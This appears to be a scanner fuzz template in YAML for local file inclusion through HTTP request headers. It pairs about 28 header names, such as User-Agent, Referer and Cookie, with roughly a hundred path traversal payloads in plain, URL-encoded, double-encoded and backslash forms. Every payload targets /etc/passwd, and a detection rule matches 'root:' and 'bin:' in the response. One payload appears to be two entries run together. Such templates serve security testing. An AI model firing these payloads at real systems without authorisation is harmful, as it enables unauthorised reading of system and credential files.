id: lfi-00
type: fuzz
level: 2
info:
  name: LFI on Headers 01
  risk: High

variables:
  - head: |
      User-Agent
      Referer
      Host
      Origin
      Authorization
      X-Forwarded
      X-Forwarded-By
      X-Forwarded-For
      Accept
      Accept-Ranges
      Access-Token
      Action
      Admin
      Ajax
      Allow
      Auth
      Auth-Basic
      Cookie
      Connection
      Forwarded
      HTTP2-Settings
      X-Original-Url
      X-Original-User-Agent
      X-Originating-Ip
      TE
      Trailer
      Transfer-Encoding
      Via

payloads:
    - '../..//etc/passwd'
    - '../../..//etc/passwd'
    - '../../../..//etc/passwd'
    - '../../../../..//etc/passwd'
    - '../../../../../..//etc/passwd'
    - '../../../../../../../..//etc/passwd'
    - '..%2f/etc/passwd'
    - '..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '..%252f/etc/passwd'
    - '..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '..\/etc/passwd'
    - '..\..\/etc/passwd'
    - '..\..\..\/etc/passwd'
    - '..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\..\..\/etc/passwd'
    - '..%255c/etc/passwd'
    - '..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd'
    - '..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'

requests:
  - generators:
      - Method(); Header("{{.payload}}", "{{.head}}")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin:")
